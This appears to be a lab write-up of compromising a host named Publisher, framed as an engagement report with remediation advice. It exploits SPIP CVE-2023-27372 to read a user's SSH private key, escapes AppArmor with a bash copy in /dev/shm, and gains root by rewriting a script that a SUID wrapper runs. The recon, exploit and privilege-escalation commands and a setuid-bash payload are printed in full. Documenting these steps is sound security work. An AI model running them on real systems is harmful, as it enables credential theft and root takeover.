Case file

SPIP CVE-2023-27372, AppArmor escape, and run_container abuse

Intermediate CMS engagement: unauthenticated SPIP RCE (CVE-2023-27372) stole think’s SSH key; AppArmor blocked /opt until an unconfined bash in /dev/shm; rewriting run_container.sh planted SUID bash.

Intermediate28 minLinux · SPIP · AppArmor · Privilege Escalation
  • SPIP under /spip was vulnerable to CVE-2023-27372. RCE read think’s id_rsa for SSH. AppArmor confined the login shell; escaping via /dev/shm bash allowed rewriting /opt/run_container.sh invoked by a SUID helper.

  • Dirbust found /spip/. CVE-2023-27372 executed commands and exposed think’s private key.

  • Unconfined bash in /dev/shm could write /opt. Overwriting run_container.sh and invoking the SUID wrapper yielded root.

01

Engagement summary

SPIP under /spip was vulnerable to CVE-2023-27372. RCE read think’s id_rsa for SSH. AppArmor confined the login shell; escaping via /dev/shm bash allowed rewriting /opt/run_container.sh invoked by a SUID helper.

Publisher (10.10.102.137) ran Apache with SPIP at /spip/. Public exploit CVE-2023-27372 executed commands without authentication. We dropped a webshell, read /home/think/.ssh/id_rsa, and SSH’d as think. Enumeration showed SUID /usr/sbin/run_container wrapping /opt/run_container.sh, but AppArmor blocked access to /opt from the default shell. Copying bash to /dev/shm and running it unconfined restored write access; we replaced run_container.sh to copy /bin/bash to /tmp with setuid, triggered the SUID helper, and executed /tmp/test -p as root.

Business impact

Unpatched SPIP is unauthenticated RCE. AppArmor profiles that leave SUID wrappers calling writable scripts under /opt are incomplete containment. Patch SPIP, remove or harden run_container, and ensure profiles cover every interpreter path used for privilege boundaries.

02

SPIP unauthenticated RCE

Dirbust found /spip/. CVE-2023-27372 executed commands and exposed think’s private key.

OPERATOR · RECON

savvy@lab:~$ nmap -sV 10.10.102.137

22/tcp open ssh OpenSSH 8.2p1

80/tcp open http Apache httpd 2.4.41

savvy@lab:~$ gobuster dir -u http://10.10.102.137 -w common.txt

/spip (Status: 301)

OPERATOR · CVE-2023-27372

savvy@lab:~$ python3 CVE-2023-27372.py -u http://10.10.102.137/spip -c 'id' -v

uid=33(www-data) gid=33(www-data) groups=33(www-data)

savvy@lab:~$ python3 CVE-2023-27372.py -u http://10.10.102.137/spip -c 'cat /home/think/.ssh/id_rsa' -v

-----BEGIN OPENSSH PRIVATE KEY-----

savvy@lab:~$ chmod 600 id_rsa && ssh think@10.10.102.137 -i id_rsa

savvy@lab:~$

03

AppArmor escape and run_container rewrite

Unconfined bash in /dev/shm could write /opt. Overwriting run_container.sh and invoking the SUID wrapper yielded root.

OPERATOR · APPARMOR / ROOT

savvy@lab:~$ ls -la /usr/sbin/run_container

-rwsr-xr-x 1 root root ... /usr/sbin/run_container

savvy@lab:~$ cd /dev/shm && cp /bin/bash . && ./bash -p

# overwrite /opt/run_container.sh (see payload), then trigger SUID helper

savvy@lab:/dev/shm$ /usr/sbin/run_container

savvy@lab:/dev/shm$ /tmp/test -p

root@lab:~# id

uid=0(root) gid=0(root) groups=0(root)

PAYLOAD

run_container.sh

#!/bin/bash
cp /bin/bash /tmp/test
chmod +s /tmp/test

Remediation

Upgrade SPIP past CVE-2023-27372; remove webshells and rotate SSH keys. Make /opt/run_container.sh root-owned immutable or eliminate the SUID wrapper; extend AppArmor to cover /dev/shm interpreters if profiles are required.